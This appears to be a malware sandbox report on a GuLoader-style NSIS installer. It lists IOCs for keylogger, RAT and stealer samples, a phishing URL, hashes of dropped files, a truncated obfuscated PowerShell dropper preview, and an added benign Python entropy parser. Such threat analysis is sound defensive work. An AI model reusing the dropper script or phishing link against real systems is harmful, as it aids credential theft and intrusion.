CLOUDFLARENETUS | https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com | malicious | HTMLPhisher | 172.64.147.188
CLOUDFLARENETUS | jd4t3R7hOq.exe | malicious | Azorult | 104.21.75.48
CLOUDFLARENETUS | RubzLi27lr.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.16.1
CLOUDFLARENETUS | 6mllsKaB2q.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 172.67.196.114
CLOUDFLARENETUS | Voicemail_+Transcription+_ATT006151.docx | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | YJwE2gTm02.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
CLOUDFLARENETUS | Y8Q1voljvb.exe | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENETUS | ofZiNLLKZU.exe | malicious | FormBook | 104.21.28.65
CLOUDFLARENETUS | xom6WSISuh.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.112.1
CLOUDFLARENETUS | 3HnH4uJtE7.exe | malicious | FormBook | 104.21.48.233
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | RubzLi27lr.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
54328bd36c14bd82ddaa0c04b25ed9ad | YJwE2gTm02.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
54328bd36c14bd82ddaa0c04b25ed9ad | xom6WSISuh.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.96.1
54328bd36c14bd82ddaa0c04b25ed9ad | AHSlIDftf1.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
54328bd36c14bd82ddaa0c04b25ed9ad | eLo1khn7DQ.exe | malicious | MassLogger RAT | 104.21.96.1
54328bd36c14bd82ddaa0c04b25ed9ad | MzqLQjCwrw.exe | malicious | MassLogger RAT | 104.21.96.1
54328bd36c14bd82ddaa0c04b25ed9ad | 3WgNXsWvMO.exe | malicious | MassLogger RAT | 104.21.96.1
54328bd36c14bd82ddaa0c04b25ed9ad | SBkuP3ACSA.exe | malicious | Snake Keylogger | 104.21.96.1
54328bd36c14bd82ddaa0c04b25ed9ad | v3tK92KcJV.exe | malicious | Snake Keylogger | 104.21.96.1
54328bd36c14bd82ddaa0c04b25ed9ad | r5yYt97sfB.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.96.1
3b5074b1b5d032e5620f69f9f700ff0e | MqzEQCpFAY.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | RubzLi27lr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | MqzEQCpFAY.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 6mllsKaB2q.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | YJwE2gTm02.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Y8Q1voljvb.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | MWP0FO5rAF.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | MWP0FO5rAF.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | AHSlIDftf1.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | eLo1khn7DQ.exe | malicious | MassLogger RAT |
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 142.250.185.174
                                                                                                                                                      • 216.58.212.161
                                                                                                                                                      RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 142.250.185.174
                                                                                                                                                      • 216.58.212.161
                                                                                                                                                      4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                                                      • 142.250.185.174
                                                                                                                                                      • 216.58.212.161
                                                                                                                                                      4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                                                      • 142.250.185.174
                                                                                                                                                      • 216.58.212.161
                                                                                                                                                      Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 142.250.185.174
                                                                                                                                                      • 216.58.212.161
                                                                                                                                                      g7Mz6hLxqw.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      • 142.250.185.174
                                                                                                                                                      • 216.58.212.161
                                                                                                                                                      ln5S7fIBkY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 142.250.185.174
                                                                                                                                                      • 216.58.212.161
                                                                                                                                                      Osb7hkGfAb.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      • 142.250.185.174
                                                                                                                                                      • 216.58.212.161
                                                                                                                                                      SvmL9tW29w.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      • 142.250.185.174
                                                                                                                                                      • 216.58.212.161
                                                                                                                                                      Osb7hkGfAb.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      • 142.250.185.174
                                                                                                                                                      • 216.58.212.161
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: C:\Users\user\AppData\Local\Temp\nsc9301.tmp\nsExec.dll
Setup.exe | malicious | Unknown
file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zip | malicious | Unknown
Justificante pago-09453256434687.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
pedido-035241.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
uu8v4UUzTU.exe | malicious | Unknown
uu8v4UUzTU.exe | malicious | Unknown
https://on-combine-data.s3.us-west-2.amazonaws.com/dealer-data/Share+Point/NTAS_MS3000X_Installer_v2.8.25_October2024_NO_UPS.exe | malicious | Unknown
https://veryfast.io | malicious | Unknown
SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe | malicious | Unknown
SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe | malicious | Unknown
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 53158
Entropy (8bit): 5.062687652912555
Encrypted: false
SSDEEP: 1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5: 5D430F1344CE89737902AEC47C61C930
SHA1: 0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256: 395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512: DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious: false
Reputation: moderate, very likely benign file
Preview: PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category: dropped
Size (bytes): 1119496
Entropy (8bit): 7.97281774973227
Encrypted: false
SSDEEP: 24576:zNrNYogUzS7ZTdlfjS03VwV5k7j5awX300zQUGtZc:Z+JI2Jj3VwXgj5aEkHUGtZc
MD5: 487FAD16DA392C87FB894A6CCBD95870
SHA1: 16F4935CE6D245D535F23A1557B6F0E0AD77BAA9
SHA-256: 2BBB66A5BAD18E8CA2FEE4FEC0BFC6CE83B1CC4852D712C986685F095B3589CE
SHA-512: BBB60D3E7A24964E100EA583BD701DBF1B1EBFFB44FD03DE5F6C096B87DE8DED04E7ECE05DD28995EB2BCDF1E3CDB1FCAA11078277CBA3B41AF1A5C4B8E04B59
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 63%
• Antivirus: Virustotal, Detection: 76%
Reputation: low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L....Oa.................f...*.......4............@.......................................@..........................................@...Y...........................................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8............~..............@....ndata...................................rsrc....Y...@...Z..................@..@................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Reputation: high, very likely benign file
Preview: [ZoneTransfer]....ZoneId=0
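The two numbers that carry most signal in these dropped-file entries are the 8-bit entropy and, for the 26-byte file above, the Zone.Identifier body. The following is an added example (not Joe Sandbox code and not part of the report) that computes the same Shannon entropy figure the report attaches to every file, applies a rule-of-thumb packed/encrypted threshold, and parses a Zone.Identifier stream into its ZoneId. Assumptions: the sample bytes are reconstructed from the preview "[ZoneTransfer]....ZoneId=0" with the four dots taken as CRLF CRLF (the report states CRLF terminators and 26 bytes, which fits), the 7.2 and 5.5 bits/byte thresholds are my own heuristics, and the uniform buffer is constructed for contrast with the 7.97-entropy NSIS executable listed above.

```python
import math
from collections import Counter
from typing import Optional

# Shannon entropy in bits per byte, the same "Entropy (8bit)" figure the
# report lists per file: 0.0 for a constant buffer, 8.0 for a uniform one.
def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())

# Rule-of-thumb classifier. The thresholds are assumed heuristics, not values
# from the report: ASCII text sits around 4-5 bits/byte, native code around
# 6, compressed or encrypted payloads (e.g. an NSIS archive body) above ~7.2.
def classify_entropy(h: float) -> str:
    if h >= 7.2:
        return "compressed/encrypted"
    if h >= 5.5:
        return "code/binary"
    return "text"

# Windows URL security zones as written into the Zone.Identifier ADS.
ZONE_NAMES = {0: "LocalMachine", 1: "LocalIntranet", 2: "Trusted",
              3: "Internet", 4: "Restricted"}

def parse_zone_identifier(data: bytes) -> Optional[int]:
    """Return the ZoneId from a Zone.Identifier ADS body, or None if absent.

    Only a ZoneId key inside the [ZoneTransfer] section counts; any other
    section or a non-numeric value yields None."""
    in_section = False
    for line in data.decode("ascii", errors="replace").splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = (line == "[ZoneTransfer]")
            continue
        if in_section and line.startswith("ZoneId="):
            try:
                return int(line.split("=", 1)[1])
            except ValueError:
                return None
    return None

# Reconstructed from the report preview (assumption: dots are CRLF CRLF).
ZONE_TRANSFER_SAMPLE = b"[ZoneTransfer]\r\n\r\nZoneId=0"

# Constructed high-entropy buffer: every byte value occurs equally often.
UNIFORM_SAMPLE = bytes(range(256)) * 16

def analyse(data: bytes) -> dict:
    """Summarise a dropped-file body the way a triage script would."""
    h = shannon_entropy(data)
    zone = parse_zone_identifier(data)
    return {
        "size": len(data),
        "entropy": h,
        "class": classify_entropy(h),
        "zone_id": zone,
        "zone_name": ZONE_NAMES.get(zone) if zone is not None else None,
    }

if __name__ == "__main__":
    for name, blob in (("Zone.Identifier", ZONE_TRANSFER_SAMPLE),
                       ("uniform", UNIFORM_SAMPLE)):
        r = analyse(blob)
        print(f"{name}: size={r['size']} entropy={r['entropy']:.6f} "
              f"class={r['class']} zone={r['zone_name']}")
```

Running it reproduces the report's 3.95006375643621 for the reconstructed Zone.Identifier body, which confirms the CRLF CRLF reading of the preview; ZoneId=0 (LocalMachine) means the dropped file carries no Mark-of-the-Web, so SmartScreen and Office protected view will not trigger on it. The 1,119,496-byte NSIS executable's 7.97 falls well inside the compressed/encrypted band, as expected for a self-extracting archive whose payload is compressed.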
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
Three further dropped-file entries are identical to the entry above in every listed field (Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File Type: ASCII text, with no line terminators; Category: dropped; Size (bytes): 60; Entropy (8bit): 4.038920595031593; Encrypted: false; SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX; MD5: D17FE0A3F47BE24A6453E9EF58C94641; SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D; SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7; SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82; Malicious: false; Preview: # PowerShell test file to determine AppLocker lockdown mode), except that no Reputation line is given for them.
Process:C:\Users\user\Desktop\fGu8xWoMrg.exe
File Type:Unicode text, UTF-8 text, with very long lines (4207), with CRLF, LF line terminators
Category:dropped
Size (bytes):76789
Entropy (8bit):5.1711478550234204
Encrypted:false
SSDEEP:1536:nduKvzZUHmehtDIXEmuVcu5Cmb7T/7DM8wFJ/Ow06T8QJ0t1y:nEKvFUvhOCcu5Cm/7DTc5Ow9T85zy
MD5:58B2D4D8DCB1F7505B049780AB782495
SHA1:7781B3DC2DA3205C27020121A5083C1A5363751B
SHA-256:FCA8D4A203B4456BD2DCC7D9D8901762199381CD6436D6DAFED510A94D173201
SHA-512:52195930E588F773CBBAB36B758B66C161A9A09BE9EC20E96D390A64A30FF92C3B2C51675EFBD921379C9B06B6B3E250040AA3F9FACAE7F01DAFF3AB7AB71D11
Malicious:true
Preview:$fiskehandlerens=$Dessertkirsebrs130;........$olivens = @'. intens.Pastelf$.ambetlfProduktoAb,olverCommendlBrak udgCre shi=Deltoid$RedressfSnuffypr Knyaz eCryp esm Allerum Bod leesextumvdT,nuscifFrugtbaj Tolvaae.dviklinTexundedSelektit.astefulS ikkeri,vingplgNumer shImperfeesta fstd rongdo;sofabor.SoundprfSigtemeuStangsinC.elomac Chado,tUvenskaiEsmakk.oE.dogennParat r BelknapKIaobs re KonomapMerduril avstste Rundpirsekunda Chillba( Bu lyi$ Ba nerAOmkartenPowspregSubsidiiUn echaoTo.sionc SproghaGratularDe.agerdFakul ei Imm,xio SnuffegOvervurrMatriloaAfstr bpFullishh Afsnrii Hasheecn vurde,afskriv$OliemalS diskotpLatomytaHeteropg Brobuea IsocoltTopske.)Evolvu Fisker{Af.nits.T.ansfo.Spisebo$BortvisUMiri anrBiciliahS.spendaDigladinUeueteoeBrugtvo Vive rk(EvacuatBTakstsdeUndersufEnomotarmobil siRatificeUrinblrlbronchosForanaleBekkasis eniorakdegraderDagbgeri .ndlingUdvi lieChlord.nTop emm Transce' D ossePGorserarBagtaleeMilieu d Ld eraiwind,ess responpFordrve$Retfrd bSpillerrMellemra Bet
Process:C:\Users\user\Desktop\fGu8xWoMrg.exe
File Type:data
Category:dropped
Size (bytes):334468
Entropy (8bit):7.603197899322113
Encrypted:false
SSDEEP:6144:K6rLZieMT4Byx7aUZMkLaQk1xQ8SCevoorLhWofAFIwiCasj:K6rvMT1NLLaJ7oprFGFIwi7y
MD5:906FDDEA67F3FCAF133C8A5FA43BC4E7
SHA1:1CB2E0442D83A8B638BF2812662C1D2A0399521F
SHA-256:5E4C3E81328F09A96778F6B07CFDE424E0A7B553B59B2C815C2A725CBD73C4C4
SHA-512:23BA6C3286149578367FFB1AF0F3D51046F7AFB972D5507C99DD47D7859664DF624BFA17BC5FB0317084643FD325DA1DFCD996A2465AE34A1A1840599DD06C78
Malicious:false
Preview:..].g...=.....NNN.MM..^..... ..GGGG......???.........................hhhhh.222.....>>...>>>.ii.......,,........T..........@@.................WWWW...........r.......=.................E.++..........?????..Q....................YY.................?.}}}}........%..................`.............mm................k..%%%..................[[[.....................?.C...................................L....$$$..L.......55...............$$$$..^^..........~~..%%%........DD.pp....!.s.....6.....9.....p........j..........ggg.....................ii..................P...........n.....L.bbb...........................iii.................==...........{.....ttt._...5555.+...g.....M..sss..................z...???.....!.......ll.....m..............e...............................`...x..v................L......,,.............................P....#........z.c.++....?..............M..............qqqq.........K..FF.d..BB.777.......=........8..'.e.................."""........................u............QQQ......
Process:C:\Users\user\Desktop\fGu8xWoMrg.exe
File Type:data
Category:dropped
Size (bytes):5657071
Entropy (8bit):0.15928467329934035
Encrypted:false
SSDEEP:768:hia6UGQo5IgoTcs1teRMojkuNW52cfotYssiEfN5RJhDjTeYJNKUGQ0yyiJ+yDKJ:RLLXHTFL
MD5:7FD6A7B5493B8D6659842CBDAC26F759
SHA1:59ECA4FEF3F72F17B4F87C647836AF1EE0B7B208
SHA-256:F38655E8753CF872BBC92F703C0A23F3CB35EFEA183296B92ADF3672A509162C
SHA-512:C300E5599EB51D0862F806DF1C6274B0D59F75E41132F85C9E47F777CDD7B2E9B67C06BC033CD1FFE1C87A7EDD6B07D3E9DAD2D280EBAB1E22C7CA6291E881F5
Malicious:false
Preview:............................................n..............S.......................................................................................................................................................................q...............................................................................................................................................................................................................................................................................................................................................................................................z.............................................................................................................................................................................................................................4..q...................................................................................................................................................................
Process:C:\Users\user\Desktop\fGu8xWoMrg.exe
File Type:data
Category:dropped
Size (bytes):108656
Entropy (8bit):0.1629399370348107
Encrypted:false
SSDEEP:48:iM4xHhYyQjrwzEa24+rFK3q01Z2FdZe/Gbjd6Ne7GJ:duhYyQjcd++7KFdZKGAw
MD5:ABD3958B383B1C9F43AC4E47DD12BEC4
SHA1:4248CEAF77E8A46BBFA08FC14BDAB5428D7194F6
SHA-256:30E7E92C51752F6CFD747EC30BF29792A819FDA586557B053FF141861BC3EA7B
SHA-512:F6FE0761F4E15D9FCCCE230FCDFC77E95A259A014654FF94A600CBA120F222ED2085B6DC3CFEC7F21177137BD5136AC42894E113EAFD1D21659FF3F14316799B
Malicious:false
Preview:............................................................................................................................................................................................................._....................................................................................................................................................................................................................................................................................................................................................................................)...........................................................<.......................................................................i.........................................................................................................................................................................................).......................................................................................................
Process:C:\Users\user\Desktop\fGu8xWoMrg.exe
File Type:data
Category:dropped
Size (bytes):6429709
Entropy (8bit):0.15806775405645646
Encrypted:false
SSDEEP:768:VNOwnrRrLv7/6Ngd/3fk7lv70zCxVdw2J+bxTylmmf13Y2jmVnc+1dHiqkGAr/EA:vGD8vB
MD5:F4FF9F83B617854EAA4804F4499C7538
SHA1:C93182B840EBDDB4A16EF90F1B0AE26DC1562FBA
SHA-256:AFA03D58592E5BE1ADF5E352A40CE899BC707BB40CC6CD1EF5930E6302A94C18
SHA-512:2E5C29BD767EEA4939A4B82CD7DD6EC323255D9046D96CE2C1931D617D125AB96ABC1F4B5444097A3A8085356FB7BD894A5C9769710B67823228BD1C371CF756
Malicious:false
Preview:...............................................................................................................................................................................................................................................................................................................r.........................................................................................................................................................Q.....................................................................................................................................................................................................................................................................................................................................................................................................................Y........................................................................................................................................
Process:C:\Users\user\Desktop\fGu8xWoMrg.exe
File Type:data
Category:dropped
Size (bytes):7637195
Entropy (8bit):0.1584950093042192
Encrypted:false
SSDEEP:768:DASGeKc+zkfELL9UhjwNNoVJ2zV7S9OrvkoAaqV6zoPv2WHiirTgQKUIZsrj6ZzL:gXK+k
MD5:EB71C6BE6D08F8A7C7C9DA1335DF04C1
SHA1:7B57A40E3F6C44178A25EF465C3E7F5EA3184335
SHA-256:D1D5BFF683EDC3A076382FCFE8C8A28EA1FF6A1C7731A80BAB8FFF0E82A54D07
SHA-512:5ED43E9E6A66F981DEEC765A13A361BCCEFE4E1A38C6847F9DB00F2ED1BF50497E36B6D5398190FB2CB0B191E4DA33A77C7378CDB446169941C84776D7406A48
Malicious:false
Preview:...................[.....................................................................................................................................................................................................................uV.......................................................................................................................>......................................................................................................................................................................................................................................................................................................................................................................................................`..............................................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\fGu8xWoMrg.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):465
Entropy (8bit):4.255544231677184
Encrypted:false
SSDEEP:12:ZR1EOIygKJPTYEO/OAOLkKARrQdNJdKiXkB9MOyFCZ60WgE:9xIyPtYEO/vlK6QUlE
MD5:2F8A39C6A08A57605F1965012760D560
SHA1:4607DE528A646C0758D7FB322CF9CCFFAFA026B8
SHA-256:37909462973046DA9CD15B9FB1CCD7F92D97C26AF08C83A8D486BA411DC69373
SHA-512:0B2F239E494FCEE5D18812D98E3571F20B049CAF11CEA675CB55E95283A6E99E7A854DD87087EC5F7C402B7A7C760A1AB4B399EA17319C1F9249465E542E2D8D
Malicious:false
Preview:pachydermateous bomuldsskjorterne redisseisin minimalists.delikatessehandlens standardfilnavn spillerelater,udstafferingers parallelforskydning ynglepladsernes libanons somatotypically inveigler sammenrendets..tyrannierne coeternally kommandrs colliquative gonidic ringetonen issens hyperanabolic unpicturesque..sminker apporterende campaigner gorvarehandlen radiosender bibelskes.logikfamilier neurotransmission pasfotoerne searchment inrighted couphgens toadfish,
Process:C:\Users\user\Desktop\fGu8xWoMrg.exe
File Type:data
Category:dropped
Size (bytes):2537825
Entropy (8bit):0.15731061171505112
Encrypted:false
SSDEEP:768:ZfmQIC91KjqGcnL63MV1HZDQDVlybvFG7dH9Sf12lqM1FBQWEP3dNaRrwPu1Br0O:Rrc
MD5:6462B1502F14E3329E79F164F0B8EDA9
SHA1:70F60B7634B75DAFA601D70E812D7127F4432AD3
SHA-256:50852368EB9E21692315077EB7DD5E833B4430342695CFF4E70FEF7DF59DCFB7
SHA-512:979F463C29EFDE5C746CE6A34B72DC064BDB9364702C5DB24B567E823B6992E076BDB160979330EDDDA03F9AE4EEB20FD1E656337A2654E43B3B36673820CF45
Malicious:false
Preview:...............M....................................................................4.......................................................................................................................R.......{......................................................................k............................................................................................................................................................................................................................................................................................................................................................................................................................................................~.............................................................................................................................................................I.................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\fGu8xWoMrg.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):7168
                                                                                                                                                                          Entropy (8bit):5.298362543684714
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
                                                                                                                                                                          MD5:675C4948E1EFC929EDCABFE67148EDDD
                                                                                                                                                                          SHA1:F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
                                                                                                                                                                          SHA-256:1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
                                                                                                                                                                          SHA-512:61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
Malicious:false (a 7 KiB DLL with 0% AV detection that recurs across the other malicious analyses listed under Joe Sandbox View is consistent with a shared installer component; the verdict on the sample rests on the behaviour reported elsewhere, not on this file)
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View (other analyses in which this same dropped file was seen):
• Filename: Setup.exe, Detection: malicious
• Filename: file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zip, Detection: malicious
• Filename: Justificante pago-09453256434687.exe, Detection: malicious
• Filename: pedido-035241.exe, Detection: malicious
• Filename: uu8v4UUzTU.exe, Detection: malicious
• Filename: uu8v4UUzTU.exe, Detection: malicious
• Filename: (empty), Detection: malicious
• Filename: (empty), Detection: malicious
• Filename: SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe, Detection: malicious
• Filename: SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe, Detection: malicious
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                          Entropy (8bit):7.97281774973227
                                                                                                                                                                          TrID:
                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                          File name:fGu8xWoMrg.exe
                                                                                                                                                                          File size:1'119'496 bytes
                                                                                                                                                                          MD5:487fad16da392c87fb894a6ccbd95870
                                                                                                                                                                          SHA1:16f4935ce6d245d535f23a1557b6f0e0ad77baa9
                                                                                                                                                                          SHA256:2bbb66a5bad18e8ca2fee4fec0bfc6ce83b1cc4852d712c986685f095b3589ce
                                                                                                                                                                          SHA512:bbb60d3e7a24964e100ea583bd701dbf1b1ebffb44fd03de5f6c096b87de8ded04e7ece05dd28995eb2bcdf1e3cdb1fcaa11078277cba3b41af1a5c4b8e04b59
                                                                                                                                                                          SSDEEP:24576:zNrNYogUzS7ZTdlfjS03VwV5k7j5awX300zQUGtZc:Z+JI2Jj3VwXgj5aEkHUGtZc
                                                                                                                                                                          TLSH:AF35234021D6F033D0B19A3BE6395CF163E9AC31C6725B2F13157F09BA796623A2D356
                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*.....
                                                                                                                                                                          Icon Hash:4e33695d030a3f39
                                                                                                                                                                          Entrypoint:0x4034f7
                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                          Time Stamp:0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                          File Version Major:4
                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                          Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
Signature Valid:false
Signature Issuer:CN=focometry, E=Uncapering@Mangold.Ans, O=focometry, L=Monon, OU="Mannoses Conventicular ", S=Indiana, C=US
Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:-2146762487 (0x800B0109, CERT_E_UNTRUSTEDROOT)
Not Before:24/12/2023 08:18:04
Not After:23/12/2024 08:18:04
Subject Chain:
• CN=focometry, E=Uncapering@Mangold.Ans, O=focometry, L=Monon, OU="Mannoses Conventicular ", S=Indiana, C=US
